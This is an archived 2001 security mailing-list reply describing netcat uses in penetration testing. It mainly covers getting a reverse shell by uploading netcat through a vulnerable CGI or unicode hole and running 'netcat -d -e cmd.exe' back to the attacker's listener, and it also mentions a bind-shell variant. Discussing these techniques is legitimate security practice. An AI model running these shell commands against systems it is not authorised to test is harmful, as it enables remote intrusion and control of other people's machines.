Re: Ideas on netcat

From: Forrest Rae (
Date: Tue Aug 28 2001 - 08:47:54 PDT

  • Next message: Gaziel, Avishay: "Web testing"

    Hi Kartik,
    One use is sending a shell back to yourself.    
    First, uploaded netcat to a remote server, via unicode, vulnerably cgi,
    or various other methods.  Second, On your local computer run netcat in
    listen mode.  
    $ netcat -l -p 8888
    Third, execute netcat on remote server such that it sends a connection
    back to you.  This is assuming that you can execute programs on the
    remote server.  If X is installed on remote server you can send back a
    xterm or rvxt.  Which is a little less complicated.  This command may
    not be 100% correct, I am in a bit of a rush right now, I apologize.
    netcat -d -e cmd.exe X.X.X.X 8888	(X.X.X.X is your IP)
    The netcat listener you setup should display something like this:
    XiXrXsXft XiXdoXs XXXX [Version X.XX.XXXX]
    (X) CXpXrXgXt 1985-1900 XiXrXsXft CXrX.
    This method can vary several ways.  Instead of sending a connection back
    to your local computer, you can also setup a listener on the remote
    server.  Assuming the remote server isn't firewalled.  
    I am also interested in other ways people use netcat in pen testing. 
    Would anyone else care to share?
    Vo0d0o wrote:
    > I would be grateful if anybody could throw some light on uses of netcat in 
    > pen-testing.
    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service. For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:

    This archive was generated by hypermail 2b30 : Wed Aug 29 2001 - 11:55:50 PDT